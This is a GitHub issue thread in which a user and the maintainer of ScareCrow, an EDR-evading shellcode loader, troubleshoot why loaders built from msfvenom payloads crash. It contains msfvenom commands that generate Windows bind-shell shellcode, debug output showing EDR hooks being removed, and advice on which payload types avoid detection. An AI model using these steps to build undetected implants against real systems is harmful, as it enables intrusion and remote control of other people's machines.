Closed 0xShkk closed 3 years ago
Can you provide me the exact version of Windows you tested on?
Sure,
it was on
OS Name: Microsoft Windows 10 Enterprise 1909 OS Version: 10.0.18363.1379
I will spin up an instance tonight for testing, to see if I can recreate this issue. But I am curious what if you tried without the -b '\x00' do you still get the same issue?
So based on my testing it looks like it's the fact you are using a staged bind shellcode. Since a staged shellcode performs the task of downloading and executing the actual shellcode from the listener. The problem here is that the binaries generated from ScareCrow use a different technique from the DLLs in which the stack pointer for the string of shellcode overwrites with attributes of an actual executable function thus when that function is executed the shellcode is executed. Because of the nature of staged payloads, this crashes the process.
I confirmed this works fine with the other modes such as -Loader control
where you can create an executable control panel applet. (As this method uses a different technique to execute shellcode) You can also use a stageless version of your shellcode and that will work just fine as well.
Based on my experience I recommend avoiding staged payloads as the communication to download the second stage (stage1) shellcode often is IOCed and detected.
I hope this helps?
Thank you for helping me out. The loader type control works just well!
Unfortunately, I can't get binary or dll to work, even with a non staged shellcode.
Oh and regarding your first question, yes without the badchar definition \x00 its the same result
This is the debug output for a non staged msf shellcode payload, if it helps:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x1 0xc03544f54b 0xc00013c013
PC=0xc00013c013
runtime: unknown pc 0xc00013c013
stack: frame={sp:0xc000130000, fp:0x0} stack=[0xc00012e000,0xc000136000)
000000c00012ff00: 0000000000000000 0000000000000000
000000c00012ff10: 0000000000000000 0000000000000000
000000c00012ff20: 0000000000000000 0000000000000000
000000c00012ff30: 0000000000000000 0000000000000000
000000c00012ff40: 0000000000000000 0000000000000000
000000c00012ff50: 0000000000000000 0000000000000000
000000c00012ff60: 0000000000000000 0000000000000000
000000c00012ff70: 0000000000000000 0000000000000000
000000c00012ff80: 0000000000000000 0000000000000000
000000c00012ff90: 0000000000000000 0000000000000000
000000c00012ffa0: 0000000000000000 0000000000000000
000000c00012ffb0: 0000000000000000 0000000000000000
000000c00012ffc0: 0000000000000000 0000000000000000
000000c00012ffd0: 0000000000000000 0000000000000000
000000c00012ffe0: 0000000000000000 0000000000000000
000000c00012fff0: 0000000000000000 0000000000000000
000000c000130000: <0000000000000000 0000000000000000
000000c000130010: 0000000000000000 0000000000000000
000000c000130020: 0000000000000000 0000000000000000
000000c000130030: 0000000000000000 0000000000000000
000000c000130040: 0000000000000000 0000000000000000
000000c000130050: 0000000000000000 0000000000000000
000000c000130060: 0000000000000000 0000000000000000
000000c000130070: 0000000000000000 0000000000000000
000000c000130080: 0000000000000000 0000000000000000
000000c000130090: 0000000000000000 0000000000000000
000000c0001300a0: 0000000000000000 0000000000000000
000000c0001300b0: 0000000000000000 0000000000000000
000000c0001300c0: 0000000000000000 0000000000000000
000000c0001300d0: 0000000000000000 0000000000000000
000000c0001300e0: 0000000000000000 0000000000000000
000000c0001300f0: 0000000000000000 0000000000000000
runtime: unknown pc 0xc00013c013
stack: frame={sp:0xc000130000, fp:0x0} stack=[0xc00012e000,0xc000136000)
000000c00012ff00: 0000000000000000 0000000000000000
000000c00012ff10: 0000000000000000 0000000000000000
000000c00012ff20: 0000000000000000 0000000000000000
000000c00012ff30: 0000000000000000 0000000000000000
000000c00012ff40: 0000000000000000 0000000000000000
000000c00012ff50: 0000000000000000 0000000000000000
000000c00012ff60: 0000000000000000 0000000000000000
000000c00012ff70: 0000000000000000 0000000000000000
000000c00012ff80: 0000000000000000 0000000000000000
000000c00012ff90: 0000000000000000 0000000000000000
000000c00012ffa0: 0000000000000000 0000000000000000
000000c00012ffb0: 0000000000000000 0000000000000000
000000c00012ffc0: 0000000000000000 0000000000000000
000000c00012ffd0: 0000000000000000 0000000000000000
000000c00012ffe0: 0000000000000000 0000000000000000
000000c00012fff0: 0000000000000000 0000000000000000
000000c000130000: <0000000000000000 0000000000000000
000000c000130010: 0000000000000000 0000000000000000
000000c000130020: 0000000000000000 0000000000000000
000000c000130030: 0000000000000000 0000000000000000
000000c000130040: 0000000000000000 0000000000000000
000000c000130050: 0000000000000000 0000000000000000
000000c000130060: 0000000000000000 0000000000000000
000000c000130070: 0000000000000000 0000000000000000
000000c000130080: 0000000000000000 0000000000000000
000000c000130090: 0000000000000000 0000000000000000
000000c0001300a0: 0000000000000000 0000000000000000
000000c0001300b0: 0000000000000000 0000000000000000
000000c0001300c0: 0000000000000000 0000000000000000
000000c0001300d0: 0000000000000000 0000000000000000
000000c0001300e0: 0000000000000000 0000000000000000
000000c0001300f0: 0000000000000000 0000000000000000
rax 0x3522f400
rbx 0x0
rcx 0xc000122c60
rdi 0xd2bc0d7000
rsi 0x1ed4e1
rbp 0xc000135f78
rsp 0xc000130000
r8 0xc000135d98
r9 0xc000135e28
r10 0x0
r11 0x212
r12 0xffffffffffffffff
r13 0x28
r14 0x27
r15 0xaa
rip 0xc00013c013
rflags 0x10206
cs 0x33
fs 0x53
gs 0x2b
I do not know if it really makes a difference but I tried to create shellcode like so:
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw -b '\x00'
msfvenom -p windows/x64/shell_bind_tcp EXITFUNC=none LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true EXITFUNC=thread LPORT=8888 -f raw -o bind2.raw
none of them above executed successfully via binary or dll loader method
I tested with the following and they worked fine in both binary and DLL format.
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_tcp
As for your debug output, the memory address look blank which tells me something else went wrong. Since you mentioned that the control loader type worked for you (which is just a fancy DLL ) I suspect something else is going, at any rate, if the control loader worked I take it I can close this issue?
The DLL loader worked for me now too. I had to rename the dll so rundll32 executed the correct one (as you mention in the tool output).
Thank you so much for this great tool and the help!
I would like to thank you for providing such an complete framework and the research details at first!
Unfortunately, I was not able to create valid payloads with ScareCrow so far. As an example, I tried the shellcode creation via msfvenom first:
or
Then I tried to use ScareCrow on it:
which succeeds in creating a binary loader. But the resulting exe is not working on an Windows box. The resulting debug output in console is:
I also tried to use Donut to create a x64 shellcode of an existing binary, as well as using dll as a Loader for ScareCrow for both generated shellcodes (msf and donut). Nothing worked so far for me.
Can you please give me more details on what kind of shellcode payload ScareCrow expects? Maybe provide some examples in the documentation?
Many thanks